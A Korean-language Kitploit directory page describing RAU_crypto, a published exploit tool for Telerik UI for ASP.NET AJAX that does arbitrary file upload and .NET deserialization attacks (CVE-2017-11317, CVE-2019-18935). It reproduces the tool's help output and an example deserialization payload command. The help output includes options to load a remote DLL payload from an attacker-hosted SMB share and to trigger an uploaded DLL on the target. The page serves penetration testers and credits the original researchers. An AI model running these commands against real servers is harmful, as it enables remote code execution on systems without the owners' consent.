Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RAU_crypto — Telerik UI for ASP.NET AJAX 파일 업로드 및 .NET 역직렬화 익스플로잇 (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935) | Kitploit
도구/GitHubGitHub/bao7uo/rau_crypto
Encryption/Decryption ToolsPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubbao7uo/rau_crypto

RAU_crypto

Telerik UI for ASP.NET AJAX 파일 업로드 및 .NET 역직렬화 익스플로잇 (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

저장소 보기
1805026년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RAU_crypto

Language

Telerik UI for ASP.NET AJAX를 위한 통합 익스플로잇.

  • CVE-2017-11317 및 CVE-2017-11357에 대한 파일 업로드 - 파일을 자동으로 업로드합니다.
  • CVE-2019-18935에 대한 .NET 역직렬화

이제 공격자가 호스팅하는 SMB 서비스에서 원격 페이로드를 가져오는 대상의 능력을 테스트할 수 있습니다. Burp Collaborator 및/또는 Responder를 사용하여 필요한 전제 조건이 갖춰져 있는지 테스트할 수 있습니다.

익스플로잇이 작동하려면 일반적으로 하드코딩된 키가 있는 버전이 필요하거나, 예를 들어 web.config의 내용을 공개할 수 있다면 키를 알아야 합니다. 또한 이 익스플로잇은 Telerik.Web.UI.WebResource.axd?type=rau와 함께 사용되는 rauPostData의 복호화 및 암호화를 간단히 수행할 수 있습니다.

요구 사항

  • pycryptodome이 설치된 python >= 3.6 (https://www.pycryptodome.org/en/latest/src/installation.html) - pip3 install pycryptodome 또는 pip3 install pycryptodomex로 설치

exploit-db에 게시됨 (이전 버전)

  • https://www.exploit-db.com/exploits/43874/

참고

제 다른 Telerik UI 익스플로잇(CVE-2017-9248)도 관심이 있을 것입니다. 다음에서 확인할 수 있습니다:

  • https://github.com/bao7uo/dp_crypto

할 일

  • 이후 버전에서 누락된 HMAC 기능.
  • 사용자 정의 키 지정 기능.
  • 혼합 모드 dll 실행을 위한 명령줄 인수 (그동안 아래 제공된 예제 .NET 역직렬화 페이로드를 사용하십시오).
  • SMB로 원격 호스팅된 혼합 모드 dll의 기능 테스트 및 로딩을 위한 명령줄 인수
  • 혼합 모드 dll 테스트를 위한 별도 유틸리티.
  • 혼합 모드 dll에 대한 소스 코드/컴파일 지침 제공.
  • 버전 무차별 대입.

참고 - 마지막 네 항목은 완료되었지만 공개되지 않았습니다.

취약점

파일 업로드(CVE-2017-11317) 취약점은 다른 사람들이 발견했으며, @straight_blast @pwntester @olekmirosh에게 공로가 있다고 생각합니다. 발표 직후, 저는 작업 중에 Telerik 라이브러리를 접하게 되었고, 그래서 이를 연구하고 취약점을 분석하여 2017년 7월에 이 익스플로잇을 작성했습니다. 또한 관련된 안전하지 않은 직접 객체 참조에 대해 CVE-2017-11357을 보고했습니다.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

.NET 역직렬화(CVE-2019-18935) 취약점은 @mwulftange가 발견했습니다.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

사용법

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

예제 - 복호화

Decrypt screenshot

예제 - 임의 파일 업로드

Upload screenshot

사용자 정의 페이로드 (.NET 역직렬화)

.NET 역직렬화를 위한 사용자 정의 페이로드에 대한 자세한 내용은 이 취약점을 발견한 @mwulftange가 Code White 블로그에 게시한 훌륭한 기사를 참조하십시오.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

업데이트 - Caleb Gross @noperator의 대체 익스플로잇이 있으며, 이 익스플로잇의 기능을 통합하고 모든 것을 설명하는 훌륭한 블로그 기사가 있습니다. 또한 RAU_Crypto에 기여한 Caleb에게 감사드립니다.

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

기타 관련 링크.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

예제 .NET 역직렬화 페이로드:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

혼합 모드 DLL에 대해서는 제 다른 github 저장소를 참조하십시오:

  • https://github.com/bao7uo/MixedUp

사용자 정의 페이로드 기능에 영감을 준 @irsdl에게 특별 감사를 드립니다.

원격 dll 기능에 영감을 준 @rwincey에게 공로를 인정합니다.

도구 다운로드